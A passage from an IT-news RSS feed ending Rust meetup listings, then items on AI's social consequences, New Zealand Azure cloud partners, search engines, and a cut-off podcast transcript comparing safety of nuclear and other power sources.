<li>2026-07-21 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/315102297/"><strong>Lunch &amp; Learn: Learning Rust as First Programming Language</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Virtual (Washington, DC, US) | <a href="https://www.meetup.com/rustdc">Rust DC</a><ul>
<li><a href="https://www.meetup.com/rustdc/events/315279653/"><strong>Mid-month Rustful</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#asia">Asia</a></h5>
<ul>
<li>2026-07-18 | Bangalore, IN | <a href="https://hasgeek.com/rustbangalore">Rust Bangalore</a><ul>
<li><a href="https://hasgeek.com/rustbangalore/july-2026-rustacean-meetup/"><strong>July 2026 Rustacean Meetup</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#europe">Europe</a></h5>
<ul>
<li>2026-06-24 | Manchester, UK | <a href="https://www.meetup.com/rust-manchester">Rust Manchester</a><ul>
<li><a href="https://www.meetup.com/rust-manchester/events/315200163/"><strong>Rust Manchester June Talks</strong></a></li>
</ul>
</li>
<li>2026-06-24 | Trondheim, NO | <a href="https://www.meetup.com/rust-trondheim">Rust Trondheim</a><ul>
<li><a href="https://www.meetup.com/rust-trondheim/events/315298357/"><strong>The Chaos of Time and Time Intervals</strong></a></li>
</ul>
</li>
<li>2026-06-25 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/314396600/"><strong>Rust Berlin Talks: The next generation</strong></a></li>
</ul>
</li>
<li>2026-06-25 | Copenhagen, DK | <a href="https://www.meetup.com/copenhagen-rust-community">Copenhagen Rust Community</a><ul>
<li><a href="https://www.meetup.com/copenhagen-rust-community/events/315214426/"><strong>Rust meetup #69</strong></a></li>
</ul>
</li>
<li>2026-06-25 | Toulouse, FR | <a href="https://www.meetup.com/rust-community-toulouse/">Rust Toulouse</a><ul>
<li><a href="https://www.meetup.com/rust-community-toulouse/events/314947457/"><strong>Rust Toulouse Meetup - Bevy &amp; ESP32</strong></a></li>
</ul>
</li>
<li>2026-06-27 | Stockholm, SE | <a href="https://www.meetup.com/stockholm-rust">Stockholm Rust</a><ul>
<li><a href="https://www.meetup.com/stockholm-rust/events/315371143/"><strong>Ferris' Fika Forum #27</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Edinburgh, UK | <a href="https://www.meetup.com/rust-edi">Rust and Friends</a><ul>
<li><a href="https://www.meetup.com/rust-and-friends/events/314941098/"><strong>Bevy, Bits, &amp; Cats (Rust July Talks)</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Enschede, NL | <a href="https://www.meetup.com/dutch-rust-meetup">Baseflow Tech Meetups</a><ul>
<li><a href="https://www.meetup.com/baseflow-tech-meetups/events/315099547/"><strong>AI Summit</strong></a></li>
</ul>
</li>
<li>2026-07-08 | Dublin, IE | <a href="https://www.meetup.com/rust-dublin">Rust Dublin</a><ul>
<li><a href="https://www.meetup.com/rust-dublin/events/315150327/"><strong>Join us live and INPERSON for Rust 262</strong></a></li>
</ul>
</li>
<li>2026-07-09 | Switzerland, CH | <a href="https://www.posttenebraslab.ch/wiki/events/start">PostTenebrasLab</a><ul>
<li><a href="https://www.posttenebraslab.ch/wiki/events/monthly_meeting/rust_meetup"><strong>Rust Meetup Geneva</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#north-america">North America</a></h5>
<ul>
<li>2026-06-24 | Austin, TX, US | <a href="https://www.meetup.com/rust-atx">Rust ATX</a><ul>
<li><a href="https://www.meetup.com/rust-atx/events/315105633/"><strong>Rust Lunch - Fareground</strong></a></li>
</ul>
</li>
<li>2026-06-24 | Los Angeles, CA, US | <a href="https://www.meetup.com/rust-los-angeles">Rust Los Angeles</a><ul>
<li><a href="https://www.meetup.com/rust-los-angeles/events/314386080/"><strong>Rust LA: Rust-Based Constraint Solvers in 2D Sketching with Zoo Technologies</strong></a></li>
</ul>
</li>
<li>2026-06-25 | Atlanta, GA, US | <a href="https://www.meetup.com/rust-atl">Rust Atlanta</a><ul>
<li><a href="https://www.meetup.com/rust-atl/events/313539326/"><strong>Rust-Atl</strong></a></li>
</ul>
</li>
<li>2026-06-25 | Mountain View, CA, US | <a href="https://www.meetup.com/hackerdojo/events/">Hacker Dojo</a><ul>
<li><a href="https://www.meetup.com/hackerdojo/events/314825008/"><strong>RUST MEETUP at HACKER DOJO</strong></a></li>
</ul>
</li>
<li>2026-06-26 | New York, NY, US | <a href="https://www.meetup.com/rust-nyc">Rust NYC</a><ul>
<li><a href="https://www.meetup.com/rust-nyc/events/315014582/"><strong>Rust NYC's Big Summer Social</strong></a></li>
</ul>
</li>
<li>2026-06-27 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225857/"><strong>Somerville Union Square Rust Lunch, June 27</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Saint Louis, MO, US | <a href="https://www.meetup.com/stl-rust">STL Rust</a><ul>
<li><a href="https://www.meetup.com/stl-rust/events/315103359/"><strong>Git is easy?</strong></a></li>
</ul>
</li>
<li>2026-07-04 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225861/"><strong>Boston University Rust Lunch, July 4</strong></a></li>
</ul>
</li>
<li>2026-07-09 | Lehi, UT, US | <a href="https://www.meetup.com/utah-rust">Utah Rust</a><ul>
<li><a href="https://www.meetup.com/utah-rust/events/314696647/"><strong>Utah Rust July Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-11 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225865/"><strong>MIT Rust Lunch, July 11</strong></a></li>
</ul>
</li>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-18 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225872/"><strong>North End Rust Lunch, July 18</strong></a></li>
</ul>
</li>
<li>2026-07-21 | San Francisco, CA, US | <a href="https://www.meetup.com/san-francisco-rust-study-group">San Francisco Rust Study Group</a><ul>
<li><a href="https://www.meetup.com/san-francisco-rust-study-group/events/314997214/"><strong>Rust Hacking in Person</strong></a></li>
</ul>
</li>
<li>2026-07-22 | Austin, TX, US | <a href="https://www.meetup.com/rust-atx">Rust ATX</a><ul>
<li><a href="https://www.meetup.com/rust-atx/events/xvkdgtyjckbdc/"><strong>Rust Lunch - Fareground</strong></a></li>
</ul>
</li>
<li>2026-07-22 | Los Angeles, CA, US | <a href="https://www.meetup.com/rust-los-angeles">Rust Los Angeles</a><ul>
<li><a href="https://www.meetup.com/rust-los-angeles/events/315376271/"><strong>Rust LA: Rust in Distributed Systems with Flight Science!</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#oceania">Oceania</a></h5>
<ul>
<li>2026-06-25 | Melbourne, AU | <a href="https://www.meetup.com/rust-melbourne">Rust Melbourne</a><ul>
<li><a href="https://www.meetup.com/rust-melbourne/events/315039461/"><strong>Rust Melbourne June 2026</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Barton, AU | <a href="https://www.meetup.com/rust-canberra">Canberra Rust User Group</a><ul>
<li><a href="https://www.meetup.com/rust-canberra/events/315307280/"><strong>July Meetup</strong></a></li>
</ul>
</li>
</ul>
<p>If you are running a Rust event please add it to the <a href="https://www.google.com/calendar/embed?src=apd9vmbc22egenmtu5l6c5jbfc%40group.calendar.google.com">calendar</a> to get
it mentioned here. Please remember to add a link to the event too.
Email the <a href="mailto:community-team@rust-lang.org">Rust Community Team</a> for access.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#jobs">Jobs</a></h4>
<p>Please see the latest <a href="https://www.reddit.com/r/rust/comments/1ttbtf5/official_rrust_whos_hiring_thread_for_jobseekers/">Who's Hiring thread on r/rust</a></p>
<h3><a class="toclink" href="https://this-week-in-rust.org/atom.xml#quote-of-the-week">Quote of the Week</a></h3>
<blockquote>
<p>I think this is the wrong decision, and I wish the lang team had stabilized the Late type instead.
Better Late than Never.</p>
</blockquote>
<p>– <a href="https://www.reddit.com/r/rust/comments/1u1v53c/the_never_type_is_likely_to_stabilize_soon/oqsxf3v/">/u/CouteauBleu on /r/rust</a></p>
<p>Thanks to <a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328/1782">Theemathas</a> for the suggestion!</p>
<p><a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328">Please submit quotes and vote for next week!</a></p>
<p>This Week in Rust is edited by:</p>
<ul>
<li><a href="https://github.com/nellshamrell">nellshamrell</a></li>
<li><a href="https://github.com/llogiq">llogiq</a></li>
<li><a href="https://github.com/ericseppanen">ericseppanen</a></li>
<li><a href="https://github.com/extrawurst">extrawurst</a></li>
<li><a href="https://github.com/U007D">U007D</a></li>
<li><a href="https://github.com/mariannegoldin">mariannegoldin</a></li>
<li><a href="https://github.com/bdillo">bdillo</a></li>
<li><a href="https://github.com/opeolluwa">opeolluwa</a></li>
<li><a href="https://github.com/bnchi">bnchi</a></li>
<li><a href="https://github.com/KannanPalani57">KannanPalani57</a></li>
<li><a href="https://github.com/tzilist">tzilist</a></li>
</ul>
<p><em>Email list hosting is sponsored by <a href="https://foundation.rust-lang.org/">The Rust Foundation</a></em></p>
<p><small><a href="https://this-week-in-rust.org/REDDIT_LINK_HERE">Discuss on r/rust</a></small></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Social consequences of AI (tdf2026)]]></title>
<description><![CDATA[Take a deep dive into scenarios of AI advances and possible consequences for society.

This talk is more impressionistic than scientific. It will attempt to trace the milestones of this rapid development, weigh possible scenarios and their societal consequences, and, based on extrapolation of sou...]]></description>
<link>https://tsecurity.de/de/3622557/it-security-video/social-consequences-of-ai-tdf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622557/it-security-video/social-consequences-of-ai-tdf2026/</guid>
<pubDate>Wed, 24 Jun 2026 20:50:16 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Take a deep dive into scenarios of AI advances and possible consequences for society.

This talk is more impressionistic than scientific. It will attempt to trace the milestones of this rapid development, weigh possible scenarios and their societal consequences, and, based on extrapolation of sources from scientific, private-sector, and political actors, explore where this journey might take us in the coming years.

Humanity  more or less unexpectedly stumbled into a future that no one would have considered remotely realistic before: Models that learn language structures have evolved into thinking machines.

Key players consider it possible and likely that these algorithms will possess abilities superior to those of humans. The debate centers more on when this will happen than on whether it will: a matter of months or decades. It is therefore high time to prepare for it.

The visions of the future could not be more different.

- Optimists predict nothing less than the end to all scarcity. The &quot;last invention humanity will ever make itself&quot; will catapult us onto a new path of growth: Scientific discoveries that would otherwise take decades of human research could be realized in just a few years. The Promises: AI models could provide us with an abundance of energy e.g. through fusion reactors and hydrogen production, and drastically extend our lives through advances in medicine. The ability to automate human activities is gradually leading us—through the replacement of information-based work and the development of robotics—into a world free of labor and coercion.
- Pessimists point above all to the insane energy demands that are exacerbating the climate crisis. The displacement of labor will result in struggles over redistribution and ultimately could lead to a collapse of the market. The prospect of weapon systems with superhuman capabilities and new strategic programs are already increasing the risk of war, as the bloc that is the first to acquire a certain level of AI-capacities threatens to become invincible. New technological advancements are leading to total surveillance, and AI applications trained on human psychology and neurology are being used for behavioral control and crowd management. Unpredictable disasters loom due to the fundamental uncontrollability of these systems and the impossibility of programming them to stable follow ethical principles.

In these dynamic times, predictions about the future are particularly uncertain and it is highly likely that expectations and extrapolations will be very wrong. Nonetheless society has to decide and act now. After the presentation there will be hopefully time for discussion. Can and if so: how should AI revolution be regulated or even slowed down and what opportunities are there? Are there methods safeguarding the inherent risks? How can we avoid that AI will become a tool for or masking of dominion? How can we avoid that AI-algorithms become private property of a few monopolists that will own the world?

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://cfp.cttue.de/tdf5/talk/JVELTC/]]></content:encoded>
</item>
<item>
<title><![CDATA[Why full-service partners are becoming critical to New Zealand’s cloud and AI future]]></title>
<description><![CDATA[New Zealand organisations are entering a new phase of cloud adoption – one where success is no longer measured simply by whether workloads move to the cloud, but by whether those environments are capable of supporting AI-driven innovation.



The opportunity is significant. AI adoption is expecte...]]></description>
<link>https://tsecurity.de/de/3620050/it-nachrichten/why-full-service-partners-are-becoming-critical-to-new-zealands-cloud-and-ai-future/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620050/it-nachrichten/why-full-service-partners-are-becoming-critical-to-new-zealands-cloud-and-ai-future/</guid>
<pubDate>Wed, 24 Jun 2026 04:33:03 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>New Zealand organisations are entering a new phase of cloud adoption – one where success is no longer measured simply by whether workloads move to the cloud, but by whether those environments are capable of supporting AI-driven innovation.</p>



<p>The opportunity is significant. AI adoption is <a href="https://news.microsoft.com/en-nz/2024/08/21/generative-ai-expected-to-more-than-double-new-zealands-productivity-report/?msockid=2813134f1e40649e000d073c1f5e6574" target="_blank" rel="sponsored">expected to add NZ$76 billion annually</a> to NZ’s economy by 2038, growing GDP by around 1 per cent every year.</p>



<p>That acceleration is also fuelling cloud investment. IDC forecasts indicate NZ’s <a href="https://my.idc.com/getdoc.jsp?containerId=AP52206825&amp;pageType" target="_blank" rel="sponsored">public cloud spend </a>will almost double from NZ$5 billion in 2024 to NZ$9.6 billion by 2028, as organisations increasingly modernise infrastructure and prepare for AI-enabled operations.</p>



<p>Increasingly, cloud is no longer viewed simply as infrastructure hosting. According to IDC, Kiwi organisations are evolving from basic “lift-and-shift” migrations toward more sophisticated cloud-native and data-driven strategies, with IT leaders now treating cloud as a platform for AI-led transformation.</p>



<p>For many organisations, however, the challenge is not whether to move – it is how to move well.</p>



<p>According to Chris Beckett, technology strategist at<a href="https://www.inde.nz/" target="_blank" rel="sponsored"> Inde Technology</a>, most NZ organisations already understand the strategic value of cloud, particularly around platforms like Microsoft Azure, but execution remains the difficult part.</p>



<p>“Cost and budget uncertainty tend to top the list,” Beckett says. “That is not because cloud is inherently expensive, but because undisciplined adoption is. Organisations that have not built proper cost governance in from day one end up with sprawl and bill shock, and that reinforces scepticism at board level.”</p>



<h2 class="wp-block-heading"><strong>Governance matters more than ever</strong></h2>



<p>One of the biggest misconceptions organisations still make is assuming cloud migration itself automatically delivers efficiency.</p>



<p>Beckett says treating cloud as a direct infrastructure replacement means organisations lose out on the opportunity to modernise architecture and operating models.</p>



<p>“The most common and costly mistake is lift and shift,” he says.</p>



<p>“When you lift and shift, you take all of your existing technical debt and put it on a meter. You are now paying cloud running costs on top of architecture decisions that were made for a different world.”</p>



<p>Instead, organisations achieving the strongest outcomes are using migration as a forcing function to modernise applications, governance and operational processes simultaneously.</p>



<p>That includes adopting Infrastructure as Code, cloud-native platform services, embedded security controls and DevOps practices from the outset.</p>



<p>According to Beckett, governance cannot be retrofitted later.</p>



<p>“Visibility and control have to be built in from day one. Retrofitting them to a running environment means you are already behind, and the bill has already arrived.”</p>



<p>This is particularly important as organisations scale AI workloads on platforms like Azure, where poorly managed environments can quickly create unpredictable consumption costs.</p>



<h2 class="wp-block-heading"><a></a><strong>The Azure advantage for NZ companies</strong></h2>



<p>The launch of Microsoft’s first New Zealand hyperscale cloud region, <a href="https://www.reseller.co.nz/article/4110758/microsofts-nz-north-datacentre-region-now-a-foundation-for-countrys-emerging-ai-economy.html" target="_blank" rel="sponsored">NZ North</a>, has also changed the conversation significantly.</p>



<p>The region already supports tenants including <a href="https://www.reseller.co.nz/article/4162332/boosting-productivity-and-skills-key-to-ai-transformation-for-spark-and-fonterra-ceos.html" target="_blank" rel="sponsored">Fonterra</a>, <a href="https://www.reseller.co.nz/article/3827902/spark-teams-with-microsoft-to-drive-cloud-transition-and-deploy-ai-company-wide.html" target="_blank" rel="sponsored">Spark</a> and <a href="https://www.reseller.co.nz/article/1296154/asb-signs-up-as-anchor-tenant-for-microsofts-nz-datacentre-region.html" target="_blank" rel="sponsored">ASB</a>, alongside smaller organisations such as Te Tumu Paeroa.</p>



<p>“For boards that have been asking, ‘where does the data actually live?’ the answer is now unambiguously here in NZ, with full Azure capability,” Beckett says. “That is a significant shift.”</p>



<p>Beyond sovereignty, Beckett says Azure is delivering measurable value across scalability for customer-facing applications, improved resilience and recovery capability, Infrastructure as Code and operational consistency, and stronger cost governance through native tooling.</p>



<p>He points to a recent engagement with a major Kiwi logistics company that migrated critical freight management systems to Azure Platform-as-a-Service infrastructure. “This was not a lift and shift, but a proper architectural rebuild. The result was scalable, always-on applications with operational visibility the team had never had before.”</p>



<h2 class="wp-block-heading"><strong>Why full-service partners are becoming more valuable</strong></h2>



<p>As cloud environments become more complex – and increasingly tied to AI initiatives, governance requirements and cybersecurity obligations – many organisations are reassessing the role of their technology partners.</p>



<p>In New Zealand, Inde works closely with Microsoft, leveraging the expertise, enablement, and partner ecosystem strength of leading IT distributor <a href="https://www.dickerdata.co.nz/" target="_blank" rel="noreferrer noopener nofollow">Dicker Data</a>.</p>



<p>Beckett argues there is a growing distinction between traditional systems integrators and full-service cloud partners.</p>



<p>“A full-service partner stays with you through the whole lifecycle: consult, create, supply and manage,” he says. “That matters in cloud, because the technology does not stop evolving once the migration is complete.”</p>



<p>The value, he says, lies not only in technical delivery, but in strategic guidance and long-term operational accountability. “A partner worth working with will tell you when you are not ready to migrate, not just help you move.”</p>



<p>He cites a healthcare engagement where Inde Technology delayed migration activity in order to first address security, identity and governance readiness through the Microsoft Cloud Adoption Framework.</p>



<p>“That was not the fastest path to a sale, but it was the right path to a good outcome,” he says.</p>



<p>This ability to assess readiness honestly is becoming increasingly important as organisations navigate growing complexity around AI, cybersecurity, compliance and operational resilience.</p>



<h2 class="wp-block-heading"><strong>Planning early creates strategic advantage</strong></h2>



<p>Beckett believes one of the biggest differentiators between successful cloud transformations and reactive migrations is timing. “The organisations that modernise well started thinking about this 18 to 36 months before the forcing function arrived.” Those forcing functions can include hardware end-of-life dates, expiring software licences or escalating operational risk.</p>



<p>“The organisations that struggle are the ones who bring a partner in at six months. At that point, options are limited, leverage is gone, and decisions are being made under pressure.”</p>



<p>“The infrastructure argument in NZ is resolved. Microsoft’s in-country datacentre means data sovereignty is no longer a reason to delay. The organisations building their roadmap today will be deploying with confidence in 18 months. The ones who wait will be reacting.”</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[I replaced Google Search with DuckDuckGo and Perplexity - my results were noticeably better]]></title>
<description><![CDATA[With Google now a cesspool of AI-generated answers, here's how to work smarter: DuckDuckGo and Perplexity are the best one-two punch in search today.]]></description>
<link>https://tsecurity.de/de/3619899/it-security-nachrichten/i-replaced-google-search-with-duckduckgo-and-perplexity-my-results-were-noticeably-better/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619899/it-security-nachrichten/i-replaced-google-search-with-duckduckgo-and-perplexity-my-results-were-noticeably-better/</guid>
<pubDate>Wed, 24 Jun 2026 02:07:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[With Google now a cesspool of AI-generated answers, here's how to work smarter: DuckDuckGo and Perplexity are the best one-two punch in search today.]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4668: Nuclear Power Technology Follow Up on Safety]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.


--------------------






01 Introduction






This is the second follow up to my 8 part series on nuclear power. In this episode I will attempt to answer a question posed by brian in ohio in a comment on HPR4583. In that comment he said:...]]></description>
<link>https://tsecurity.de/de/3619898/podcasts/hpr4668-nuclear-power-technology-follow-up-on-safety/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619898/podcasts/hpr4668-nuclear-power-technology-follow-up-on-safety/</guid>
<pubDate>Wed, 24 Jun 2026 02:03:28 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

<p>
--------------------</p>

<p>

</p>

<p>
01 Introduction</p>

<p>

</p>

<p>
This is the second follow up to my 8 part series on nuclear power. In this episode I will attempt to answer a question posed by brian in ohio in a comment on HPR4583. In that comment he said:</p>

<p>

</p>

<p>
02</p>

<p>
--------------------</p>

<p>

</p>

<p>
Loving this series. Maybe Whiskey Jack could give some cost comparisons between large and small reactors. He could also give us a realistic look at nuclear plant safety/accidents compared to conventional power production. Looking forward to the episode on FORTH generation reactors ;-)</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
03</p>

<p>
End of quote.</p>

<p>

</p>

<p>
The first question I answered in my previous follow up, which was HPR4628. In this episode I will attempt to answer the second question, which was about the safety of nuclear power compared to other sources of electrical power generation.</p>

<p>

</p>

<p>
One of the HPR janitors encouraged me to make this episode, so I think we can thank him for getting another HPR episode made.</p>

<p>

</p>

<p>
04 Defining the Scope</p>

<p>
First, let's define the scope of the question. </p>

<p>

</p>

<p>
This will cover electrical power generation only.</p>

<p>
Within that scope I will consider only the following sources of energy.</p>

<p>

</p>

<p>
05</p>

<p>
Coal</p>

<p>
Oil</p>

<p>
Natural Gas</p>

<p>
Hydroelectric</p>

<p>
Nuclear</p>

<p>
Wind</p>

<p>
Solar</p>

<p>

</p>

<p>
I won't cover geothermal, wave, or tidal power as these are only used in very small amounts and so there simply isn't enough literature on them to base a discussion on . </p>

<p>

</p>

<p>
06 Foreshadow Conclusion</p>

<p>
I should mention right away that I cannot provide absolute answers to this question in the form of a nice, neat ranking table based on numbers from peer reviewed scientific sources. </p>

<p>
The reasons for this will become apparent, but to put it briefly, the data on which to base such a ranking simply doesn't exist. </p>

<p>

</p>

<p>
I will however provide context within which people can think about the issue.</p>

<p>
Wherever possible, I will provide links to the references that I used in the show notes so you can read further on this yourself.</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
07 Energy Catastrophism versus Energy Uniformitarianism</p>

<p>

</p>

<p>
First though I need to go off on a slight geological detour in order to explain an important analogy that I will use.</p>

<p>

</p>

<p>
08</p>

<p>
In the 19th century there was a great debate among geologists over what is known as catastrophism versus uniformitarianism.</p>

<p>
In seeking to explain the origins of the earth and of the landscape that we see around us, there were two points of view.</p>

<p>

</p>

<p>
09</p>

<p>
One was "catastrophism". </p>

<p>
This is the belief that the mountains, valleys, and plains that we see around us were formed as a result of great catastrophes which occurred relatively recently in earth's history. </p>

<p>
This explanation was necessary in order to fit geological features into an earth that was believed to be only a few thousands of years old.</p>

<p>
This view was heavily influenced  by religious belief.</p>

<p>
In this view Noah's flood was the great catastrophe and the fossils of dinosaurs were the remains of animals who had not been saved on the ark and so had died in the flood.</p>

<p>

</p>

<p>
10</p>

<p>
The other point of view was uniformitarianism.</p>

<p>
This was the hypothesis that the landscape we see around us can be explained by the very slow accumulation of very small changes over very long periods of time. </p>

<p>
For this to be true however, the earth had to be far older than the few thousand years that a literal reading of the bible would suggest.</p>

<p>
The earth in fact had to be many, many, millions of years old.</p>

<p>

</p>

<p>
11</p>

<p>
Eventually, the uniformitarian view won out and people understood that while some catastrophes can take place, the shape of the landscape is overwhelmingly due to small changes over very long periods of time.</p>

<p>

</p>

<p>

</p>

<p>
12 How is this Relevant to this Episode You Ask?</p>

<p>
How this is relevant is that I will use this analogy to explain how we need to think about energy and safety.</p>

<p>
Very small numbers of deaths and injuries multiplied over many occurrences can add up to big numbers, comparable in scale or possibly even larger than a single catastrophe or even several of them.</p>

<p>

</p>

<p>
13</p>

<p>
I don't know if anyone else has used this analogy before, I have just thought of this when writing the script for this podcast.</p>

<p>
None the less, I think it is a very useful way of helping to understand the issues.</p>

<p>

</p>

<p>
14</p>

<p>
As an example of this, think about the well known case of the safety of flying versus the safety of travelling in your car.</p>

<p>
Air crashes are catastrophes that make the headlines.</p>

<p>
Automobile crashes are seldom more than local news at best.</p>

<p>
You have probably heard many times the claim that if you making a trip somewhere, you are safer to fly than to drive yourself in your car.</p>

<p>

</p>

<p>

</p>

<p>
15 Example - Hydro versus Solar</p>

<p>
I will now present an example of this.</p>

<p>
Hydro electric power has some notable large scale catastrophes associated with it.</p>

<p>
Roof top solar power does not have any notable catastrophes that I am aware of.</p>

<p>
However, which is safer?</p>

<p>

</p>

<p>
16 Hydro Catastrophes</p>

<p>
Here are three examples of hydro electric catastrophes in just one country, Italy.</p>

<p>

</p>

<p>
The Vajont Dam which collapsed in1963</p>

<p>
An estimated 1,917 to 2,500 people died.</p>

<p>

</p>

<p>
The Sella Zerbino dam which collapsed in 1935.</p>

<p>
More than 100 people died.</p>

<p>

</p>

<p>
The Gleno Dam which collapsed in 1923.</p>

<p>
An estimated 350 people died.</p>

<p>

</p>

<p>
https://damfailures.org/</p>

<p>
https://pmc.ncbi.nlm.nih.gov/articles/PMC4997708/</p>

<p>

</p>

<p>
17</p>

<p>
I haven't tried to compile a global list of the worst hydro electric dam collapses, as this sort of information is actually very difficult to find, even on web sites dedicated to dam failures.</p>

<p>
An additional problem is that information on whether a dam was used for electric power generation or not is often not available.</p>

<p>

</p>

<p>
18</p>

<p>
Dam failures where contradictory or insufficient information is available on whether there was an associated hydro power plant include the 1975 Banqian Dam failure, where death estimates range up to a quarter of a million.</p>

<p>

</p>

<p>
19 Solar Panel Slow Accumulation</p>

<p>
Contrast this with roof top solar panels.</p>

<p>
Many small accidents can add up to big numbers as well.</p>

<p>

</p>

<p>
20</p>

<p>
Health and safety literature discussing solar panel safety mention things such as</p>

<p>
Falls from roofs.</p>

<p>
Electric shock.</p>

<p>
Arc flash (burns from electrical arcing).</p>

<p>
Normal electrical safety procedures which are based around locking out sources of energy do not work with solar panels which makes safety more difficult.</p>

<p>
Heat stress due to working exposed in the hot sun.</p>

<p>

</p>

<p>
Warning from US government on falls by solar panel installers.</p>

<p>
https://stacks.cdc.gov/view/cdc/228946</p>

<p>
https://www.osha.gov/green-jobs/solar</p>

<p>

</p>

<p>

</p>

<p>
21 Why We Cannot Compare the Two</p>

<p>
Hydro catastrophes are not well documented, but we can at least find records of some of the most notable ones.</p>

<p>
However, even those have very large variations in estimates of deaths.</p>

<p>

</p>

<p>
22</p>

<p>
Roof top solar deaths however are largely undocumented.</p>

<p>
The industry is largely unregulated.</p>

<p>
There is no central authority which accumulates many individual deaths or injuries.</p>

<p>
At best there are worker and public safety bodies who simply accumulate those statistics into general construction or household injuries.</p>

<p>

</p>

<p>
23</p>

<p>
Thus we have no reliable means of comparing the two energy sources on a comparable basis.</p>

<p>
We face the same problem with all other major electrical energy sources. </p>

<p>
So far as I am aware, there are no peer reviewed scientific studies which compare the relative safety of all of the major electrical energy sources we are considering here based on actual numbers.</p>

<p>

</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
24 Safety Risks</p>

<p>

</p>

<p>
I will now try to list some the major hazards for each of energy sources we are considering.</p>

<p>
There is however limited data available.</p>

<p>
In many cases we just have reference to worker safety organizations as to what the hazards are.</p>

<p>
I will not attempt here to put numbers to these here. </p>

<p>

</p>

<p>
Categories</p>

<p>

</p>

<p>
25 Coal, Oil, Natural Gas</p>

<p>
The hazards are</p>

<p>
Air pollution</p>

<p>
Mining and oil field accidents</p>

<p>
Pipeline explosions</p>

<p>
Transportation accidents. These- move a lot of material so these are significant.</p>

<p>

</p>

<p>
26 Hydroelectric</p>

<p>
These include</p>

<p>
Dam collapse</p>

<p>
Drowning</p>

<p>

</p>

<p>
27 Nuclear</p>

<p>
These include</p>

<p>
Radiation exposure</p>

<p>

</p>

<p>
28 Wind</p>

<p>
These include</p>

<p>
Falls</p>

<p>
Confined space deaths (there is not much detail on this)</p>

<p>
Electric shock</p>

<p>
Ice throws (that is, throwing pieces of ice off the blades)</p>

<p>
This technology has a significant problem with people working alone which greatly increases risks associated with other dangers.</p>

<p>

</p>

<p>
29 Solar</p>

<p>
These include</p>

<p>
Falls</p>

<p>
Electric shock</p>

<p>
Arc flash</p>

<p>
Heat stress</p>

<p>

</p>

<p>
30</p>

<p>
I have not tried to cover all possible risks associated with each category, just the ones which each industry considers to be the risks they concern themselves with.</p>

<p>
There does not exist any means by which risks of similar types are compared across different industries. </p>

<p>

</p>

<p>
31 Reliability of Supply is Also Safety</p>

<p>
In a completely electrified net zero society, reliability of supply is a safety matter.</p>

<p>
People will die in very large numbers in cold climates if they do not have heat.</p>

<p>
If we have no fossil fuels, we need to also consider how reliably does a grid based on any of the options work.</p>

<p>
I have not seen anyone attempt to address this question and will not attempt to address it here.</p>

<p>
However, it must be addressed in any comprehensive attempt to rank safety. </p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
